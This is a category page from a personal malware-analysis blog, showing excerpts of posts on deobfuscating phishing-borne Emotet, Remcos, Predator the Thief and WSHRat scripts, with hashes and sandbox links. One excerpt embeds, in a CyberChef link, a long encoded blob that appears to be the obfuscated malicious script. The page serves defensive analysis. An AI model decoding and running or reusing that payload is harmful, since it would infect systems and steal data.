Deobfuscating Code – Lost in Security (and mostly everything else)

2022-02-13 Breaking out the WD40! First Stage Downloader For Remcos RAT

February 15, 2022 October 13, 2024Code

It has been a while since I have played with any malware or tried to RE a script of some sort. So here goes nothing… Shout out to David Ledbetter for the assist. Solid work as usual! This post will cover the downloader script from a Remcos maldoc that I was playing with from the beginning of the month. The email itself was your standard fare – a Wells Fargo phishing email that had an Excel XLSB attachment that was encrypted. The Excel XLSB can be found over at Any.Run or over at my Github here. A special shoutout to…

2020-09-22 Deobfuscating Emotet Script

September 22, 2020 September 22, 2020Code

Summary ========= In this post I am going to cover how I managed to to deobfuscate the macro for this Emotet (Epoch 2) sample. The maldoc can be found here. Analysis ========== With this, I started off with the tried and true OleTools suite to see if I could get anything from this sample. Unfortunately I got a lot of Python errors when trying to run this. I then tried to run it through OfficeMalscanner and got nothing back as well. Looking at the Word doc via “file” I could see that there was a macro in the file and…

2020-03-20 More Predator The Thief Malspam – Covid-19 Themed

March 20, 2020 March 20, 2020Code

Meta ===== From: *.xyz Subject: Various Covid-19 Attachment: covidXX_form.zip This looks to be related to Predator the Thief malspam based on the final script that gets executed which looks very close to the sample that I posted about over here. The zip file and VBScript can be found in my Github repo here. Here is the code in the actual VBScript. And then with it decoded (first pass). Which leads to this final code being runned on the system. Reference ========== – http://urlhaus.abuse.ch/browse.php?search=show1.website – http://malshare.com/search.php?query=d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c – http://bazaar.abuse.ch/browse.php?search=d231d81538b16728c2e31c3f9e0f3f2e700d122119599b052b9081c2c80ecd5c – http://app.any.run/tasks/8f771d9c-355f-4262-bac0-0a1927f52222/ – http://gchq.github.io/CyberChef/#recipe=Reverse(‘Character’)From_Base64(‘A-Za-z0-9%2B/%3D’,true)Remove_null_bytes()&input=PT1BQTNBd2FBVUdBNEFRYUFBQ0EwQndjQWtHQU1CQWRBNEdBbEJRYkFVSEFuQmdjQUVFQXRBQUlBa0dBdEJ3TkFFREF5QkFJQU1IQXpCUVpBTUdBdkJnY0FBRkF0QUFkQUlIQWhCQWRBTUZBZ0FBSUFzREEzQXdhQVVHQTRBUWFBQUNBMEJnZUFVR0FyQmdhQUFDQWxCQVpBOEdBakJRWkFRR0F0QUFJQXdHQXBCQWRBVUhBMEJnY0FVR0FqQkFJQXNEQWlBQVVBMEVBRkJBVkFvREEyQmdiQVVHQWtBZ0lBQUNBb0JBZEFFR0FRQlFMQUFDQXVCd2JBa0dBMEJRWUFNR0F2QkFUQTBDQTBCUVpBTUZBZ0F3T0FJQ0F0QndiQU1HQXVBUWVBOEVBWkJBVUFrR0FjQkFVQTBFQUZCQVZBb0RBMkJnYkFVR0FrQWdJQXdDQWlBQWRBb0hBbEJ3YUFvR0FjQkFVQTBFQUZCQVZBb0RBMkJnYkFVR0FrQWdJQXdDQWlBUWJBOEdBakJnTEFrR0F0QndOQUVEQXlCQVhBQUZBTkJRUkFRRkE2QWdkQTRHQWxCQUpBSUNBZ0FnYkE4R0FwQkFkQUVHQXVCUWFBUUhBekJRWkFRRUF0QUFJQVFIQWhCQVpBNENBNUJ3VEFrRkFRQlFhQThDQWxCQWRBa0dBekJnWUFVR0EzQmdMQUVEQTNCd2JBZ0dBekJ3TEE4Q0E2QUFjQVFIQTBCQWFBd0NBMEJRWUFRR0F1QUFUQUVHQTVCUVpBZ0VBdkFRWkFRSEFwQndjQUlHQWxCd2RBNENBeEF3ZEE4R0FvQndjQThDQXZBZ09BQUhBMEJBZEFnR0FzQUFkQUVHQWtCZ0xBTUZBQkJnY0FVR0FQQndMQVVHQTBCUWFBTUhBaUJRWkFjSEF1QVFNQWNIQXZCQWFBTUhBdkF3TEFvREF3QkFkQVFIQW9CQUlBVUdBakJnY0FVSEF2QndVQTBDQWdBZ2NBVUdBbUJ3Y0E0R0FoQmdjQVFGQXpCQWRBa0dBQ0JRTEFRSEF5QlFZQVFIQVRCQUlBc0RBeUJRWkFZR0F6QmdiQUVHQXlCQVZBTUhBMEJRYUFJRUFnQVFaQXdHQTFCQVpBOEdBTkJRTEFRSEF5QndiQUFIQXRCUVM Artifacts ========== Email hashes ————- 182a2cc132f77bacda747c8b36ae82d807e5a3cee01c734deb29f2598b992918 —— ahpwzh909165720504.eml b23c073099a90b2d42c12c05ed86b09fc8ca563b044a411db55a066ce717cb69…

2020-03-18 Deobfuscation of MalDoc script – Possibly Predator the Thief

March 19, 2020 March 19, 2020Code

Meta ====== From: Debt Collections Agency Houston Subject: Collection letter for Account Identification number 021621495WZ Attachment: Word file I came across a piece of malspam that caught my eye. I did not try to run this since it was not responding in Any.Run and based on the results from URLHaus, the site was taken offline. Looking at VT and some other sites, I was not able to find any more information about this maldoc. The fun part with this one was trying to figure out what the macro was doing without having to execute it. Based on what I saw…

2019-10-16 Emotet maldoc deobfuscated

October 16, 2019 October 16, 2019Code

This sample is from a batch of emotet emails that I found in the email filters back on Monday afternoon (2019-10-14). While all the documents had a different hash (attached to this write-up), the macro that was executed was the same. Based on the URLs found in this sample, this looks like it was from “epoch 2” of emotet as documented here. This write-up is to document how I managed to deobfuscate the macro script. Artifacts =========== Analysis ========= To make this easier, I decided to use OfficeMalScanner to get the files that contained the macro code. Looking at those…

2019-08-23 WSHRat Javascript de-obfuscation

August 23, 2019 August 23, 2019Code

Special thanks to one of my colleagues and @nazywam on Twitter that helped me with this. The Twitter thread about this can be found here. To obtain the Javascript file, see the Any.Run link here. The other day (2019-08-20) while looking at caught emails in the SPAM folder, I came across this malspam that was referencing a request for quote (ala: RFQ). The email had an attachment to it that was Gzipped. Unzipping it I saw there was a nicely obfuscated Javascript file. Opening it up and looking through it, there was some clear text code that follows after a…

2019-02-12 Deobfuscating an Emotet maldoc

February 14, 2019 February 14, 2019Code

This blog entry is going to cover how I managed to de-obfuscate the macro from the Emotet sample that I was able to grab. The maldoc can be found in my Github repo located here: http://github.com/bloomer1016/2019-02-12-Deobfuscating-Emotet-Maldoc. Indicators of Compromise: ========================== MD5 of Word doc: 35c716c82f9912cb1a57bf7ee72e0c53 VT: http://www.virustotal.com/#/file/9fb5e5242394557e27ca3ccfc492f7db0f7474662148a8797953df702b4d78db/detection Any.Run: http://app.any.run/tasks/0e428667-3602-489f-85ac-1f022e2c9c1f Analysis: ========= So to be honest, I was using this maldoc as a case to try to get better using oledump from Didier Stevens. This all stems from his latest posts on the SANS ISC blog (http://isc.sans.edu/forums/diary/Maldoc+Analysis+of+the+Weekend/24626/ and http://isc.sans.edu/forums/diary/Video+Maldoc+Analysis+of+the+Weekend/24628/). Unfortunately I was not able to get this maldoc de-obfuscated as easily…